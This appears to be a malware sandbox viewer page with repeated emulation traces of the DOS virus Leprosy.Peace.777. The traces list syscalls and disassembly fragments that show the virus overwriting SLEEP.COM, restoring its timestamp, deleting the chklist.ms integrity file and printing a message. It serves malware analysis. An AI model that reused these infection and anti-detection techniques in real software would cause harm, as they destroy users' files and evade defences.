Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Peace.777

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:17:16.609929264Z 78 PC: 12b5d | Find first file
2018-12-17T22:17:16.615184169Z 42 PC: 12b6f | Get date 0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-17T22:17:16.618229592Z 78 PC: 12b87 | Find first file
2018-12-17T22:17:16.624139042Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:17:16.63058238Z 87 PC: 12ba4 | Get or set file date and time
2018-12-17T22:17:16.632909851Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-17T22:17:16.64766226Z 87 PC: 12be4 | Get or set file date and time
2018-12-17T22:17:16.649614992Z 62 PC: 12bc1 | Close file
2018-12-17T22:17:16.658263058Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:17:16.667200847Z 44 PC: 12c0c | Get time 0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-17T22:17:16.669655577Z 9 PC: 12c1c | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-17T22:17:16.678898235Z 76 PC: 12c20 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3033,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:02.601934507Z 78 PC: 12b5d | Find first file
2018-12-25T11:48:02.6093985Z 42 PC: 12b6f | Get date 0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-25T11:48:02.611804755Z 78 PC: 12b87 | Find first file
2018-12-25T11:48:02.618577376Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:02.626728045Z 87 PC: 12ba4 | Get or set file date and time
2018-12-25T11:48:02.629269327Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-25T11:48:02.644541901Z 87 PC: 12be4 | Get or set file date and time
2018-12-25T11:48:02.646360904Z 62 PC: 12bc1 | Close file
2018-12-25T11:48:02.658145605Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-25T11:48:02.664709447Z 44 PC: 12c0c | Get time 0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T11:48:02.667110176Z 76 PC: 12c15 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3033,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:03.263814847Z 78 PC: 12b5d | Find first file
2018-12-25T11:48:03.269466104Z 42 PC: 12b6f | Get date 0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-25T11:48:03.271504115Z 78 PC: 12b87 | Find first file
2018-12-25T11:48:03.277228585Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:03.283872184Z 87 PC: 12ba4 | Get or set file date and time
2018-12-25T11:48:03.285145378Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-25T11:48:03.305209527Z 87 PC: 12be4 | Get or set file date and time
2018-12-25T11:48:03.307223322Z 62 PC: 12bc1 | Close file
2018-12-25T11:48:03.314849037Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-25T11:48:03.320882761Z 44 PC: 12c0c | Get time 0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T11:48:03.323966925Z 76 PC: 12c15 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":3033,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:03.453508336Z 78 PC: 12b5d | Find first file
2018-12-25T11:48:03.467605698Z 42 PC: 12b6f | Get date 0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-25T11:48:03.469709834Z 78 PC: 12b87 | Find first file
2018-12-25T11:48:03.477831054Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:03.484462732Z 87 PC: 12ba4 | Get or set file date and time
2018-12-25T11:48:03.486139679Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-25T11:48:03.49957937Z 87 PC: 12be4 | Get or set file date and time
2018-12-25T11:48:03.502501843Z 62 PC: 12bc1 | Close file
2018-12-25T11:48:03.509825883Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-25T11:48:03.515649182Z 44 PC: 12c0c | Get time 0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T11:48:03.51811213Z 9 PC: 12c1c | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-25T11:48:03.524307772Z 76 PC: 12c20 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":3033,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:08.026582376Z 78 PC: 12b5d | Find first file
2018-12-25T11:48:08.033450649Z 42 PC: 12b6f | Get date 0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-25T11:48:08.039413131Z 78 PC: 12b87 | Find first file
2018-12-25T11:48:08.045897661Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:08.053622759Z 87 PC: 12ba4 | Get or set file date and time
2018-12-25T11:48:08.055467097Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-25T11:48:09.217613831Z 87 PC: 12be4 | Get or set file date and time
2018-12-25T11:48:09.222789089Z 62 PC: 12bc1 | Close file
2018-12-25T11:48:09.237339279Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-25T11:48:09.244628209Z 44 PC: 12c0c | Get time 0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T11:48:09.247606304Z 9 PC: 12c1c | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-25T11:48:09.255791461Z 76 PC: 12c20 | Terminate with return code (Return code = '36')